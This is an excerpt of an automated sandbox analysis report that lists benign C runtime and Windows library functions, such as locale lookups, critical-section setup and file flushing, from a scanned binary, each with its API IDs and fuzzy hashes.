                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                            • String ID: false$false
                                                                            • API String ID: 3668304517-3709328725
                                                                            • Opcode ID: bdfd5e478f8d5c1e37b730327fc16c2f557cc4971eec6492818f541d607dca6e
                                                                            • Instruction ID: c6ce82619973a170121f3bc432a07b68539cb5986f40ce6ff65290f4b1526211
                                                                            • Opcode Fuzzy Hash: bdfd5e478f8d5c1e37b730327fc16c2f557cc4971eec6492818f541d607dca6e
                                                                            • Instruction Fuzzy Hash: 0E315C72228B4580FA13DB26F8997EA6760F78D3A4F900611E79D036F5EF78C545C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400027F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                            • String ID: true$true
                                                                            • API String ID: 3668304517-2879613866
                                                                            • Opcode ID: 23f64d0e50f501fbe73214a1fd7889908ac85007caa76620ab75920969cf0976
                                                                            • Instruction ID: febe12413654d29f01812ed7d4bff5e631bf879b6688f919646e0280be1b7b67
                                                                            • Opcode Fuzzy Hash: 23f64d0e50f501fbe73214a1fd7889908ac85007caa76620ab75920969cf0976
                                                                            • Instruction Fuzzy Hash: D7317C72225B4480FA22EB16F8997DA2360A78D3E4F900612E79D436F5EF7CC285C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014006C3AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: PropertyList
                                                                            • API String ID: 2525500382-1939653111
                                                                            • Opcode ID: 37385cecaab63a90d064f619d50396618d26a2f2e13a66f0ce477c6e8471a613
                                                                            • Instruction ID: d3e8e5d3784c24b11f00461443bf69e5de1259fa76df658bc52d89c665f66652
                                                                            • Opcode Fuzzy Hash: 37385cecaab63a90d064f619d50396618d26a2f2e13a66f0ce477c6e8471a613
                                                                            • Instruction Fuzzy Hash: A721A17621568081EA12CF17E8147BDA361F349BE0F248A12EB9D473E8DF79C491C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F0240 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Stringtry_get_function
                                                                            • String ID: LCMapStringEx
                                                                            • API String ID: 2588686239-3893581201
                                                                            • Opcode ID: 030c86258ba8f6641351f9fefa24165196a0330b41f7cd7e3849baf109006a80
                                                                            • Instruction ID: 663ae21239dff8ae2e3b628b0159d7f067f3fe513256871bcdfced9f1c56f13a
                                                                            • Opcode Fuzzy Hash: 030c86258ba8f6641351f9fefa24165196a0330b41f7cd7e3849baf109006a80
                                                                            • Instruction Fuzzy Hash: 54110336608BC086DB61CB56F48079AB7A5F7CDB94F54412AEF8D83B69DF38C4508B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401E8318 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _handle_error
                                                                            • String ID: !$sqrt
                                                                            • API String ID: 1757819995-799759792
                                                                            • Opcode ID: c1c3901215b94e0fdb42854f93618c38de63cceecb0da175c05832da6b8865f4
                                                                            • Instruction ID: 6dea1c9ec29ca287abe730b2372ff2e6a7f89cbc1dfff3965aa0a6769d16d7ac
                                                                            • Opcode Fuzzy Hash: c1c3901215b94e0fdb42854f93618c38de63cceecb0da175c05832da6b8865f4
                                                                            • Instruction Fuzzy Hash: DA11B972914B8482DF12CF11A44035E6661FBDABF4F108315AB6D067D8DB3CD0459B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140088744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionInflateMaskRect$InfoMetricsSystemVerifyVersion
                                                                            • String ID: iii
                                                                            • API String ID: 1664059064-940974255
                                                                            • Opcode ID: 60df5d9fb41b2a18bdcb4f9ef365ce8f41e2d11fc3bba53bde57d37a9c19b17d
                                                                            • Instruction ID: fc33e75d129eea52a943dff87cc1195db0f3d41db0048789fc3c456756c7604d
                                                                            • Opcode Fuzzy Hash: 60df5d9fb41b2a18bdcb4f9ef365ce8f41e2d11fc3bba53bde57d37a9c19b17d
                                                                            • Instruction Fuzzy Hash: E821EC35E5094096F6229B13B968BD46761B35D7F9F804128EF094BAF1DBBDC8448744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F46C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FlushFileBuffers.KERNEL32(?,?,?,00000001401F47C7,?,?,?,?,?,?,00000001401E41EF,?,?,?,00000001401E40BD), ref: 00000001401F4712
                                                                            • GetLastError.KERNEL32(?,?,?,00000001401F47C7,?,?,?,?,?,?,00000001401E41EF,?,?,?,00000001401E40BD), ref: 00000001401F4726
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: BuffersErrorFileFlushLast
                                                                            • String ID: pPE
                                                                            • API String ID: 1917127615-398285065
                                                                            • Opcode ID: fdd8c075a622ab11259e26b4beb99dc0f7da5fe0da22bbd8df2bc5bbc2d94739
                                                                            • Instruction ID: 7ac9101514603e59cb6e8453658762b047aeeb11fc4a8c8ac1e25b04454f0bf0
                                                                            • Opcode Fuzzy Hash: fdd8c075a622ab11259e26b4beb99dc0f7da5fe0da22bbd8df2bc5bbc2d94739
                                                                            • Instruction Fuzzy Hash: 3401DF72310B8986EB46AFA7E4887DD33A1AB4DF90F444128EB494B3F6CB78C854C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F00B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultUsertry_get_function
                                                                            • String ID: GetUserDefaultLocaleName
                                                                            • API String ID: 3217810228-151340334
                                                                            • Opcode ID: 839dc8e67221ebc988e7ea1f2dbec7581856d3339ff0fa01f76b01bcad8e7138
                                                                            • Instruction ID: eb613d84da41e7d68304e9f96c6a9ff5366ec54f7dbed47a229f0f749f2d4907
                                                                            • Opcode Fuzzy Hash: 839dc8e67221ebc988e7ea1f2dbec7581856d3339ff0fa01f76b01bcad8e7138
                                                                            • Instruction Fuzzy Hash: 62F0A73531458092FB575B57B954FEA52A2AB8CBD0F444039AF090B7F5CFB8C8498340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F0114 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0145
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00456068,00000001401F2796,?,?,?,00000001401F268E,?,?,?,00000001401E3E6E), ref: 00000001401F015F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                            • String ID: InitializeCriticalSectionEx
                                                                            • API String ID: 539475747-3084827643
                                                                            • Opcode ID: 4fc85808838f021f37183eb0652e05b8640de35167ecf98938ddd4554dbb72a6
                                                                            • Instruction ID: 392302d9b49bd3709b0ec367b7e8b58497cc0b4f8b7130960dc591f468539747
                                                                            • Opcode Fuzzy Hash: 4fc85808838f021f37183eb0652e05b8640de35167ecf98938ddd4554dbb72a6
                                                                            • Instruction Fuzzy Hash: E6F0E235714B80C2EB069B43F808BDA2621F78CBD0F484029EB5D07BA8CF78C844C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401F031C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DownlevelLocaleName__crttry_get_function
                                                                            • String ID: LocaleNameToLCID
                                                                            • API String ID: 404522899-2050040251
                                                                            • Opcode ID: 304a77f7ab7c86e17e5440ab3ac69b1f209eb3badc2171328e25d96a0cc05762
                                                                            • Instruction ID: 31c4e0d57233f64d59cee30f66f242c20ea0aae41aa45013229f68d07de4da71
                                                                            • Opcode Fuzzy Hash: 304a77f7ab7c86e17e5440ab3ac69b1f209eb3badc2171328e25d96a0cc05762
                                                                            • Instruction Fuzzy Hash: 64E0923271054092FA179B53F4547EA2331AB8CB90F584035EB1D0B6F5CF78C8448341
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%